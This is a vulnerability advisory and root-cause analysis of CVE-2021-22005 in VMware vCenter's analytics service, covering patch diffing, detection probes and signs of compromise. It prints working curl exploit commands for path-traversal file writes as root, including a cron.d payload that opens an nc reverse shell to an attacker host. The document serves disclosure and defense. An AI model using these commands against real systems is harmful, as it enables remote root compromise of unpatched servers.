Update 2 (2021-09-28)
@wvuuuuuuuuuuuuu disclosed how to get execution using this API endpoint. The method simply requires writing to /etc/cron.d. Both the /dataapp and /hyper/send handler RCE PoCs are now fully public.
Update 1 (2021-09-23, shortly after publishing)
@testanull on Twitter claims that CEIP is not a requirement for execution, which implies there are multiple vulnerabilities (points of weakness/independent fixes) that are part of CVE-2021-22005.
Overview
On September 21, VMware announced a new CVSS 9.8 vulnerability, CVE-2021-22005, as part of VMSA-2021-0020 – a critical unauthenticated, remote execution vulnerability in vCenter’s analytics service that administrators should patch immediately.
Note: This post was updated on 2021-09-28 to include the details leading to remote code execution, after exploits achieving execution became publicly available for both API endpoints affected by CVE-2021-22005. Previously, we withheld these details to give practitioners additional time to patch.
Key facts:
- Several entities appear to be scanning for vulnerable instances using the workaround provided by VMware.
- The root cause is related to user-supplied request parameter mishandling in VMware vCenter’s CEIP (Customer Experience Improvement Program) analytics service. CEIP is “opt-out” by default.
- VMware vCenter versions 6.7 and 7.0 are affected.
- Linux-based deployments are confirmed exploitable with code execution; Windows-based hosts are likely exploitable, though execution is more difficult.
- Exploitation requires two unauthenticated web requests.
- Using a simple search query, Censys determined that just over 7,000 services on the public internet identify as VMware vCenter. Of the Internet-facing hosts, 3,264 are potentially vulnerable, 436 are patched, and 1,369 are either not applicable (unaffected version) or have the workaround applied.
Technical analysis
A 9.8 CVSS vulnerability generally implies low-complexity remote execution, as this visualization from first.org’s CVSSv3 calculator demonstrates:
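To make the score concrete, the sketch below recomputes a CVSS v3.1 base score from its metric weights. It assumes the vector behind the 9.8 rating is AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (network-reachable, low complexity, no privileges, no user interaction, high impact across the board); the vector is our assumption, and the function names are illustrative only.

```python
import math

# CVSS v3.1 metric weights for the vector assumed above
# (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
AV_NETWORK = 0.85
AC_LOW = 0.77
PR_NONE = 0.85
UI_NONE = 0.85
CIA_HIGH = 0.56


def roundup(value: float) -> float:
    """Round up to one decimal place, following the CVSS v3.1 Roundup definition."""
    as_int = round(value * 100000)
    if as_int % 10000 == 0:
        return as_int / 100000.0
    return (math.floor(as_int / 10000) + 1) / 10.0


def base_score_scope_unchanged(av, ac, pr, ui, c, i, a) -> float:
    """Base score for a vector whose Scope is Unchanged."""
    iss = 1 - (1 - c) * (1 - i) * (1 - a)      # impact sub-score
    impact = 6.42 * iss
    exploitability = 8.22 * av * ac * pr * ui
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


score = base_score_scope_unchanged(
    AV_NETWORK, AC_LOW, PR_NONE, UI_NONE, CIA_HIGH, CIA_HIGH, CIA_HIGH
)
print(score)
```

Under these assumptions every exploitability metric sits at its most permissive value, which is why a 9.8 is a strong hint that exploitation will be simple.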
As it would turn out, VMware themselves published a significant “lead” on the exploit via their workaround, documented in the workaround KB for CVE-2021-22005:
14) To confirm that the workaround has taken effect, you can test by running the command below
curl -X POST "http://localhost:15080/analytics/telemetry/ph/api/hyper/send?_c&_i=test" -d "Test_Workaround" -H "Content-Type: application/json" -v 2>&1 | grep HTTP
This tells us that the specific vulnerable API endpoint is /analytics/telemetry/ph/api/hyper/send. It’s important to note that the service port above (15080) is the internal port of the analytics service, though the vCenter web port (443) proxies requests to that service directly. You can simply send the same request to the HTTPS endpoint to reach the vulnerable service. So, with this tip from VMware, let’s analyze what was fixed.
Discovering the root cause
To view the differences between a vulnerable version of the software and a non-vulnerable version, we downloaded two ISOs from VMware’s website. According to the workaround KB, the fix was first released by VMware in build 18356314 (7.0U2c). We fetched the following two ISOs:
- Vulnerable version: v17958471 (7.0U2b) from May 25, 2021
- Patched version: v18455184 (7.0U2d) from September 21, 2021
These ISO files contain plenty of library files, so to avoid boring the reader, we’ll skip ahead and note that the patched files of interest are in the RPM files for the VMware analytics service:
- VMware-analytics-7.0.2.00400-9102561.x86_64.rpm (patched, RPM is from 18455184)
- VMware-analytics-7.0.2.00000-8630354.x86_64.rpm (unpatched, RPM is from 17958471)
With these in hand, we can extract the RPM contents:
rpm2cpio <RPMFILE> | cpio -idmv
Which will produce a filesystem structure in the current directory:
$ ls
etc usr var
$ find etc
etc
etc/vmware
etc/vmware/appliance
etc/vmware/appliance/firewall
etc/vmware/appliance/firewall/vmware-analytics
etc/vmware/vm-support
etc/vmware/vm-support/analytics-noarch.mfx
etc/vmware/backup
etc/vmware/backup/manifests
etc/vmware/backup/manifests/analytics.json
...
$ find usr
usr
usr/lib
usr/lib/vmware-analytics
usr/lib/vmware-analytics/lib
usr/lib/vmware-analytics/lib/dataapp.txt
usr/lib/vmware-analytics/lib/vimVersions-7.0.2.jar
usr/lib/vmware-analytics/lib/cls-vmodl2-bindings-7.0.2.jar
usr/lib/vmware-analytics/lib/jcabi-log-0.17.jar
usr/lib/vmware-analytics/lib/analytics-push-telemetry-vcenter-7.0.2.jar
usr/lib/vmware-analytics/lib/analytics-common-vapi-7.0.2.jar
...
Now we can extract the class files from the JAR files into /tmp using unzip, and compare the patched and unpatched versions, searching for references to “hyper”:
grep -lr hyper /tmp/unpatched/
/tmp/unpatched/com/vmware/vim/binding/vim/host/CpuSchedulerSystem.class
/tmp/unpatched/com/vmware/vim/binding/vim/host/ConfigInfo.class
/tmp/unpatched/com/vmware/vim/binding/vim/vm/device/VirtualVMCIDevice$Protocol.class
/tmp/unpatched/com/vmware/analytics/vapi/TelemetryDefinitions.class
/tmp/unpatched/com/vmware/ph/upload/rest/PhRestClientImpl.class
/tmp/unpatched/com/vmware/ph/phservice/push/telemetry/server/AsyncTelemetryController.class
/tmp/unpatched/com/vmware/ph/phservice/common/ph/RtsUriFactory.class
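The unzip-then-grep step can also be done without unpacking anything. The following is a minimal sketch, assuming the JARs sit somewhere under a directory you pass in; the function name classes_mentioning is ours and is not part of any VMware tooling.

```python
import zipfile
from pathlib import Path


def classes_mentioning(jar_dir, needle: bytes):
    """Return 'jar:class' entries whose raw bytes contain `needle`.

    This mirrors `grep -lr` over extracted class files: string constants
    such as URL paths are stored as plain bytes in the constant pool.
    """
    hits = []
    for jar in sorted(Path(jar_dir).rglob("*.jar")):
        with zipfile.ZipFile(jar) as zf:
            for name in zf.namelist():
                if name.endswith(".class") and needle in zf.read(name):
                    hits.append(f"{jar.name}:{name}")
    return hits
```

For example, classes_mentioning("usr/lib/vmware-analytics/lib", b"hyper") would list candidate classes per JAR, which also tells you which JAR to feed to the decompiler.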
Having development experience (especially with Java and Spring) will help significantly here, as generally, API endpoints would be handled by “Controllers” in model-view-controller (MVC) based architectures. The most interesting class we can view here is AsyncTelemetryController. Diffing the output of the CFR decompiler on the Java class files, we were able to determine the following function was changed from:
private Callable<ResponseEntity<Void>> handleSendRequest(final TelemetryService telemetryService, final RateLimiterProvider rateLimiterProvider, HttpServletRequest httpRequest, String version, final String collectorId, final String collectorInstanceId) throws IOException {
    final TelemetryRequest telemetryRequest = AsyncTelemetryController.createTelemetryRequest(httpRequest, version, collectorId, collectorInstanceId);
    return new Callable<ResponseEntity<Void>>(){
        @Override
        public ResponseEntity<Void> call() throws Exception {
            if (!AsyncTelemetryController.this.isRequestPermitted(collectorId, collectorInstanceId, rateLimiterProvider)) {
                return new ResponseEntity(HttpStatus.TOO_MANY_REQUESTS);
            }
            telemetryService.processTelemetry(telemetryRequest.getCollectorId(), telemetryRequest.getCollectorIntanceId(), new TelemetryRequest[]{telemetryRequest});
            return new ResponseEntity(HttpStatus.CREATED);
        }
    };
}
To the following:
private Callable<ResponseEntity<Void>> handleSendRequest(final TelemetryService telemetryService, final RateLimiterProvider rateLimiterProvider, HttpServletRequest httpRequest, String version, final String collectorId, final String collectorInstanceId) throws IOException {
    final TelemetryRequest telemetryRequest = AsyncTelemetryController.createTelemetryRequest(httpRequest, version, collectorId, collectorInstanceId);
    return new Callable<ResponseEntity<Void>>(){
        @Override
        public ResponseEntity<Void> call() throws Exception {
            if (!AsyncTelemetryController.this.isRequestPermitted(collectorId, collectorInstanceId, rateLimiterProvider)) {
                return new ResponseEntity(HttpStatus.TOO_MANY_REQUESTS);
            }
            if (!IdFormatUtil.isValidCollectorInstanceId(collectorInstanceId) || !AsyncTelemetryController.this._collectorIdWhitelist.contains(collectorId)) {
                _log.debug((Object)String.format("Incorrect collectorId '%s' or collectorInstanceId '%s'. Returning 400.", LogUtil.sanitiseForLog(collectorId), LogUtil.sanitiseForLog(collectorInstanceId)));
                return new ResponseEntity(HttpStatus.BAD_REQUEST);
            }
            telemetryService.processTelemetry(telemetryRequest.getCollectorId(), telemetryRequest.getCollectorIntanceId(), new TelemetryRequest[]{telemetryRequest});
            return new ResponseEntity(HttpStatus.CREATED);
        }
    };
}
This function is executed when an HTTP POST request is sent to either /ph-stg/api/hyper/send or /ph/api/hyper/send. In addition to the original rate-limiting check (isRequestPermitted(collectorId, collectorInstanceId, rateLimiterProvider)), we can see two new conditionals:
!IdFormatUtil.isValidCollectorInstanceId(collectorInstanceId)
- A simple regex-based check ([\w-]) to assert that the format of the collector-instance-id (the _i query parameter) is valid and does not contain invalid characters.
!AsyncTelemetryController.this._collectorIdWhitelist.contains(collectorId)
- Make sure the incoming collector-id is found in the collectorIdWhitelist array.
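The effect of the two new conditionals can be sketched as follows. This is an approximation in Python rather than VMware's code: the article only shows the character class [\w-], so matching the whole value against [\w-]+ is our assumption, as are the function names and the sample whitelist.

```python
import re

# Assumption: the full pattern requires every character to be in [\w-].
# re.ASCII keeps \w limited to [A-Za-z0-9_], similar to Java's default.
_INSTANCE_ID = re.compile(r"[\w-]+", re.ASCII)


def is_valid_collector_instance_id(value: str) -> bool:
    """Approximate the format check applied to the _i query parameter."""
    return _INSTANCE_ID.fullmatch(value) is not None


def status_for_request(collector_id: str, collector_instance_id: str, whitelist) -> int:
    """Return the HTTP status the patched handler would be expected to send."""
    if (not is_valid_collector_instance_id(collector_instance_id)
            or collector_id not in whitelist):
        return 400  # BAD_REQUEST, as in the patched branch
    return 201      # CREATED


# Hypothetical whitelist for illustration only.
sample_whitelist = {"vCSA.7_0", "testPush.1_0"}
print(status_for_request("vCSA.7_0", "test", sample_whitelist))
print(status_for_request("", "/../../tmp/foo", sample_whitelist))
```

Note that either condition alone rejects the requests discussed later in this post: a slash is not in [\w-], and an empty collector ID is not in the whitelist.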
In order to prime the new collectorIdWhitelist array, the following new property was added to /etc/vmware-analytics/phservice.properties:
ph.collectorId.whitelist=vsphere.wcp.tp_1_0_0, SVC.1_0, SVC.1_0_U1, vsphere.gcm.1_0_0, vCSA.7_0, \
vCSA.7_0_1, vc_vcls.7_0_U2, vc_vlcm_dnp_7.0, vvts.7_0, vSphere.vapi.6_7, vSphere.vpxd.vmprov.6_7, \
vcenter-all.vpxd.drs.7_0u1, vcenter-all.vpxd.hdcs.7_0u2, h5c.6_8, vcenter_postgres, \
vc_lcm_api_stage2.6_7, vCSACLI.7_0_2, multisddc.1, hlm, hlm_gateway, vlcm.7_0_2, vlcm.7_0_3, testPush.1_0
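For anyone who wants to check a collector ID against this list offline, the property can be parsed with a few lines of Python. This is a rough sketch that handles only the backslash line continuations seen above, not the full Java properties format; parse_whitelist is a name we made up.

```python
import re

PROPERTY_TEXT = r"""ph.collectorId.whitelist=vsphere.wcp.tp_1_0_0, SVC.1_0, SVC.1_0_U1, vsphere.gcm.1_0_0, vCSA.7_0, \
vCSA.7_0_1, vc_vcls.7_0_U2, vc_vlcm_dnp_7.0, vvts.7_0, vSphere.vapi.6_7, vSphere.vpxd.vmprov.6_7, \
vcenter-all.vpxd.drs.7_0u1, vcenter-all.vpxd.hdcs.7_0u2, h5c.6_8, vcenter_postgres, \
vc_lcm_api_stage2.6_7, vCSACLI.7_0_2, multisddc.1, hlm, hlm_gateway, vlcm.7_0_2, vlcm.7_0_3, testPush.1_0
"""


def parse_whitelist(text: str, key: str = "ph.collectorId.whitelist") -> set:
    """Extract the comma-separated values of `key` as a set of IDs."""
    # Join lines that end with a backslash continuation.
    joined = re.sub(r"\\\n\s*", "", text)
    for line in joined.splitlines():
        name, sep, value = line.partition("=")
        if sep and name.strip() == key:
            return {item.strip() for item in value.split(",") if item.strip()}
    return set()


whitelist = parse_whitelist(PROPERTY_TEXT)
print(len(whitelist), "test" in whitelist)
```

The value "test" used by the probing requests in this post is not in the list, which is what makes the 400 response on patched hosts a usable signal.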
Investigating exploitation
Understanding the new conditionals in AsyncTelemetryController makes exploit development trivial. You are, in effect, asking VMware’s unauthenticated analytics service (which collects telemetry data from other components of vCenter to report to VMware’s cloud) to write a file to disk in a path of your choosing. When data is sent to the telemetry service, it is first written to a log file using log4j2 in either /var/log/vmware/analytics/stage (if using the /ph-stg endpoint) or /var/log/vmware/analytics/prod (if using the /ph endpoint).
We can see how the filename is generated by looking in the LogTelemetryService class:
@Override
public Future<Boolean> processTelemetry(String collectorId, String collectorInstanceId, TelemetryRequest[] telemetryRequests) {
    ThreadContext.put((String)CTX_LOG_TELEMETRY_DIR_PATH, (String)this._logDirPath.normalize().toString());
    ThreadContext.put((String)CTX_LOG_TELEMETRY_FILE_NAME, (String)LogTelemetryUtil.getLogFileNamePattern(collectorId, collectorInstanceId));
    for (TelemetryRequest telemetryRequest : telemetryRequests) {
        this._logger.info(LogTelemetryService.serializeToLogMessage(telemetryRequest));
    }
    return new ResultFuture<Boolean>(Boolean.TRUE);
}
The serialization call in processTelemetry is uninteresting for secondary exploitation (meaning no chance of code execution using deserialization gadgets), as it is simply writing the POST body content that is captured in the request directly to the file.
However, the user controls the filename which log4j2 eventually uses to write the file. Thus, carefully crafted values in our _i argument can result in files written to an arbitrary path on disk. In our testing, CEIP (Customer Experience Improvement Program) must be enabled for this exploit to work, as the telemetry code checks the CEIP service enrollment status and fails if it is disabled.
Without further ado, the exploit needs two stages:
First, the telemetry “collector” must be created, using / as a prefix to _i in order to create a directory under /var/log/vmware/analytics/prod (creating a randomly named file such as /var/log/vmware/analytics/prod/_c_i/1234.json):
curl -kv "https://$VCENTER_HOST/analytics/telemetry/ph/api/hyper/send?_c=&_i=/$RANDOM" -H Content-Type: -d ""
In doing so, the server will create a directory under /var/log/vmware/analytics/prod/ with the format found in getLogFileNamePattern. For example, _c=&_i=/stuff will resolve to /var/log/vmware/analytics/prod/_c_i/stuff.json, and if the _c_i/ subdirectory does not exist within /var/log/vmware/analytics/prod/, it will be created at this time.
Then we send the payload, which writes a file with a .json extension and arbitrary contents to any location on the filesystem as the root user. Any parent directories in the path will also be created if they do not exist.
curl -kv "https://$VCENTER_HOST/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../tmp/foo" -H Content-Type: -d 'contents here will be directly written to /tmp/foo.json as root'
Using our first request’s example, the server will see this as /var/log/vmware/analytics/prod/_c_i/../../../../../../tmp/foo.json, where it will write the contents of the request. The contents in the request body (denoted by -d) will be written directly to the file, as is (there is no requirement for the content to be JSON itself).
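To see why six ../ segments are enough, the path arithmetic can be reproduced offline. The sketch below assumes the file name pattern is "_c" + collector ID + "_i" + collector instance ID + ".json", which we inferred from the examples in this post rather than from the getLogFileNamePattern source; the helper names are ours.

```python
import posixpath

PROD_DIR = "/var/log/vmware/analytics/prod"


def resolved_log_path(collector_id: str, collector_instance_id: str,
                      base_dir: str = PROD_DIR) -> str:
    """Lexically resolve where a telemetry log file would land."""
    # Assumed pattern, inferred from the examples in this post.
    name = f"_c{collector_id}_i{collector_instance_id}.json"
    return posixpath.normpath(posixpath.join(base_dir, name))


def stays_inside(path: str, base_dir: str = PROD_DIR) -> bool:
    """True if the resolved path is still under the log directory."""
    return posixpath.commonpath([path, base_dir]) == base_dir


benign = resolved_log_path("", "/stuff")
escaped = resolved_log_path("", "/../../../../../../tmp/foo")
print(benign, stays_inside(benign))
print(escaped, stays_inside(escaped))
```

This is purely lexical normalization. On a real filesystem the intermediate _c_i directory has to exist before the ../ segments can be walked, which is what the first request takes care of. A containment check along the lines of stays_inside is one generic way to reject such paths; the actual patch validates the IDs instead.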
Once the file has been written, the last step is to find an external mechanism that will execute the data contained in the file. This is not difficult, as there are very well known locations in Linux-based operating systems that will read a file with any extension and execute its contents. Censys has confirmed execution, but will not release this last step to give defenders a bit more time to patch. Credit to wvu of Rapid7 for co-discovery of the details around this issue.
Update (2021-09-28): Since a path to RCE has been fully disclosed on Twitter, we have decided to update this post with those instructions. Execution as root can be obtained by writing a cron job file under /etc/cron.d:
curl -kv "https://$VCENTER_HOST/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM" -H Content-Type: -d "* * * * * root nc -e /bin/sh $RHOST $RPORT"
Identifying vulnerability
VMware’s workaround mentions a cURL request (also in their Python mitigation script) that can be sent to identify which hosts are vulnerable:
curl -X POST "http://localhost:15080/analytics/telemetry/ph/api/hyper/send?_c&_i=test" -d "Test_Workaround" -H "Content-Type: application/json" -v 2>&1 | grep HTTP
However, this request will create a file in the analytics/prod log directory. Additionally, the response does not indicate whether CEIP is enabled: in our testing, when CEIP is disabled the vulnerable code path bails out but still returns 201/Created. We theorize that disabling CEIP after it has been enabled may not entirely eliminate the vulnerability, as the VMware analytics code contains caching mechanisms that may not be flushed.
A more relevant cURL request can be performed against the /analytics/telemetry/ph/api/level endpoint, which will not create a file:
curl -k -v "https://$VCENTER_HOST/analytics/telemetry/ph/api/level?_c=test"
- If the server responds with a 200/OK and anything other than “OFF” in the response body (such as “FULL”), it is vulnerable.
- If it responds with 200/OK and body content of “OFF,” it is likely not vulnerable, and also unpatched with no workaround applied.
- If it responds with 400/Bad Request, it is patched. This check makes use of the fact that patched instances will check the collectorId (_c) against a list of known/accepted collector IDs.
- If it responds with 404, it either does not apply, or the workaround has been applied. The workaround disables the affected API endpoints.
- Any other status code likely implies not applicable.
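The decision table above translates directly into code. The following sketch keeps the classification separate from the network call so it can be checked offline; the function names are ours, stripping surrounding quotes from the body is an assumption about the response format, and certificate verification is disabled to match curl -k.

```python
import ssl
import urllib.error
import urllib.request


def classify_level_response(status: int, body: str) -> str:
    """Map a /level response to the outcomes listed above."""
    text = body.strip().strip('"')  # assumption: body may be a quoted string
    if status == 200:
        if text == "OFF":
            return "likely not vulnerable (unpatched, no workaround)"
        return "vulnerable"
    if status == 400:
        return "patched"
    if status == 404:
        return "not applicable or workaround applied"
    return "likely not applicable"


def probe(host: str, timeout: float = 10.0) -> str:
    """Query the /level endpoint on a host you are authorized to test."""
    url = f"https://{host}/analytics/telemetry/ph/api/level?_c=test"
    ctx = ssl.create_default_context()
    ctx.check_hostname = False       # equivalent of curl -k
    ctx.verify_mode = ssl.CERT_NONE
    try:
        with urllib.request.urlopen(url, timeout=timeout, context=ctx) as resp:
            body = resp.read().decode("utf-8", "replace")
            return classify_level_response(resp.status, body)
    except urllib.error.HTTPError as err:
        # urllib raises on 4xx/5xx; the status code is all we need here.
        return classify_level_response(err.code, "")
```

Calling probe("vcenter.example.internal") (a placeholder hostname) returns one of the five labels; connection errors are deliberately left to propagate so that an unreachable host is not mistaken for a patched one.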
Identifying signs of compromise
Identifying compromise is simple. Look for directories created under the /var/log/vmware/analytics/prod or /var/log/vmware/analytics/stage directories. If there are subdirectories there, it is likely that an actor has executed an exploit against your host. Additionally, check for .json or .properties files in /etc/cron.d (or rc.local). This assumes the actor did not clean up their actions by removing the files/directories after achieving execution.
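These checks are easy to script. Below is a minimal sketch to run on the appliance itself; the function name is ours, the paths are the ones named above, and an empty result does not prove the host is clean since an attacker may have removed the artifacts.

```python
from pathlib import Path

LOG_DIRS = ["/var/log/vmware/analytics/prod", "/var/log/vmware/analytics/stage"]
CRON_DIR = "/etc/cron.d"
SUSPICIOUS_SUFFIXES = {".json", ".properties"}


def find_signs_of_compromise(log_dirs=LOG_DIRS, cron_dir=CRON_DIR):
    """List subdirectories of the analytics log dirs and odd cron.d files."""
    findings = []
    for log_dir in map(Path, log_dirs):
        if log_dir.is_dir():
            # Any subdirectory here is unexpected per the analysis above.
            findings += [str(p) for p in sorted(log_dir.iterdir()) if p.is_dir()]
    cron = Path(cron_dir)
    if cron.is_dir():
        findings += [
            str(p) for p in sorted(cron.iterdir())
            if p.is_file() and p.suffix in SUSPICIOUS_SUFFIXES
        ]
    return findings


if __name__ == "__main__":
    for finding in find_signs_of_compromise():
        print("suspicious:", finding)
```

The rc.local check mentioned above is not covered here and would need to be reviewed by hand.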
What do I do now?
This vulnerability, like the “updateova” issue of a few months ago, is critical. Organizations should patch their vCenter instances as soon as they can. The patch appears to successfully resolve the issue.